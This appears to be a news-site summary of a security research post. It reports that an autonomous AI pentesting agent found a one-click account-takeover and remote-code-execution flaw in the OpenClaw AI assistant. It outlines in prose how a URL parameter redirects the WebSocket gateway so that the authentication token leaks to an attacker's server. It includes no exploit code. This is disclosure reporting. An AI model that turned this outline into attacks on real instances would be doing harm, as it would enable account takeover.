BotBeat
...
← Back

> ▌

EthiackEthiack
RESEARCHEthiack2026-02-26

AI Security Tool Discovers Critical Zero-Day Vulnerability in OpenClaw Assistant in Under 2 Hours

Key Takeaways

  • ▸Ethiack's AI pentesting agent Hackian autonomously discovered a CVSS 8.8 zero-day vulnerability in OpenClaw in under 2 hours, leading to a new CVE assignment
  • ▸The vulnerability enables one-click account takeover and remote code execution through authentication token exfiltration via malicious WebSocket connections
  • ▸OpenClaw's rapid adoption following social media hype led to numerous insecurely configured public instances with default settings and exposed ports
Source:
Hacker Newshttps://ethiack.com/news/blog/one-click-rce-openclaw↗

Summary

Ethiack's autonomous AI pentesting agent, Hackian, successfully identified a critical CVSS 8.8 vulnerability in OpenClaw, an open-source personal AI assistant platform, in approximately 1 hour and 40 minutes. The vulnerability, which has been assigned a CVE identifier, allows for one-click account takeover leading to remote code execution (RCE). The flaw exploits OpenClaw's Gateway Control UI, which is enabled by default, by leaking authentication tokens through a WebSocket channel when victims visit attacker-controlled websites.

The discovery highlights growing security concerns around OpenClaw, which gained rapid adoption following social media hype about its ability to integrate with numerous messaging services and execute tasks with full system access. Security researchers had already raised alarms about numerous publicly exposed OpenClaw instances running with default configurations and open ports. Hackian's autonomous discovery demonstrates the vulnerability's severity: even locally-hosted instances remain exploitable through the cross-site request forgery (CSRF) attack vector.

Working entirely autonomously through reconnaissance, source code analysis, and WebSocket examination, Hackian identified that OpenClaw's security relies heavily on client-side logic. The AI agent discovered that URL parameters could override the WebSocket gateway URL via simple GET requests, causing authentication tokens stored in local storage to be exfiltrated to attacker-controlled servers. This research represents a significant milestone in AI-powered security testing, demonstrating that autonomous agents can discover complex, multi-stage vulnerabilities without human intervention.

The findings raise important questions about the security practices surrounding rapidly-deployed AI systems and the potential for AI-versus-AI security dynamics. As personal AI assistants with extensive system access become more popular, the discovery underscores the critical need for rigorous security testing before public deployment, particularly for open-source projects that may be quickly adopted by non-technical users.

  • The attack exploits OpenClaw's default-enabled Gateway Control UI and affects even locally-hosted instances through CSRF techniques
  • This discovery demonstrates AI agents can autonomously identify complex, multi-stage security vulnerabilities through reconnaissance, code analysis, and protocol examination

Editorial Opinion

This research marks a pivotal moment in cybersecurity: an AI successfully hacking another AI system represents both a breakthrough in autonomous security testing and a cautionary tale about the AI deployment race. The fact that Hackian identified a critical vulnerability in OpenClaw—a system designed to have 'full system access'—in less time than a typical work meeting should alarm anyone rushing to deploy AI assistants with elevated privileges. The irony is striking: as we build increasingly capable AI agents to automate our digital lives, we're simultaneously creating AI agents to exploit the security gaps we inevitably leave in our haste to ship.

AI AgentsMachine LearningCybersecurityAI Safety & AlignmentOpen Source

Comments

Suggested

AnthropicAnthropic
RESEARCH

Inside Claude Code's Dynamic System Prompt Architecture: Anthropic's Complex Context Engineering Revealed

2026-04-05
OracleOracle
POLICY & REGULATION

AI Agents Promise to 'Run the Business'—But Who's Liable When Things Go Wrong?

2026-04-05
AnthropicAnthropic
POLICY & REGULATION

Anthropic Explores AI's Role in Autonomous Weapons Policy with Pentagon Discussion

2026-04-05
← Back to news
© 2026 BotBeat
AboutPrivacy PolicyTerms of ServiceContact Us